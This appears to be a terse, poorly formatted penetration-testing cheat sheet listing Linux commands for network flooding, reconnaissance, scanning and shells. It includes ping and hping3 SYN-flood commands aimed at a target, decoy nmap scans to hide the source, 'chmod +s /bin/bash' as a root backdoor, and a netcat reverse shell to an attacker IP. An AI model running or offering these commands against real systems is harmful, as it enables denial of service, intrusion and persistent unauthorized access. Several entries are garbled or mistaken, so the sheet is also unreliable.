Sep 6, 2024
ping <hostname>
(default packet size 64 bytes).ping -s <size> <hostname>
.ping -s 1300 -f <hostname>
to flood the target.apt install iftop
iftop
to monitor bandwidth usage.apt install hping3
hping3 -S -V --flood -p 80 <target>
(for TCP packets).hping3 --traceroute -V -1 <target>
for ICMP or specify port with -p 80
.apt install p-tunnel
p-tunnel
on target, then ptunnel -p <proxy_address> -lp <local_port> -da <destination_address> -dp <destination_port>
.tcpdump
.command | vim -
:!<command>
.apt install nmap
nmap -sn <target_network>
.nmap -sV <target>
.nmap -O <target>
.nmap --script vuln <target>
.nmap -D RND:10 <target>
to obscure source.apt install masscan
masscan -p<ports> <network>
.-rate <number>
for speed.ls
results in a steam locomotive on screen.cat /dev/urandom
for random data.apt install whois
whois <domain>
for domain information.apt install whatweb
whatweb <domain>
to identify technologies used on websites.curl -I <url>
for headers.apt install nikto
nikto -h <host>
for vulnerability scans.apt install gobuster
gobuster dir -u <url> -w <wordlist>
.apt install sublist3r
.
sublist3r -d <domain>
.apt install wpscan
wpscan --url <url> --enumerate u
for user enumeration.apt install amass
amass enum -d <domain>
for subdomain enumeration.apt install git
git clone <repo_url>
.searchsploit <keyword>
.chmod +s /bin/bash
.apt install tcpdump
and apt install tshark
tcpdump -i <interface>
.tcpdump -r <file>
.ssh user@host 'command'
.ssh -D <port> user@host
.apt install netcat-traditional
nc -lvnp <port>
(attacker), nc -e /bin/sh <attacker_ip> <port>
(target).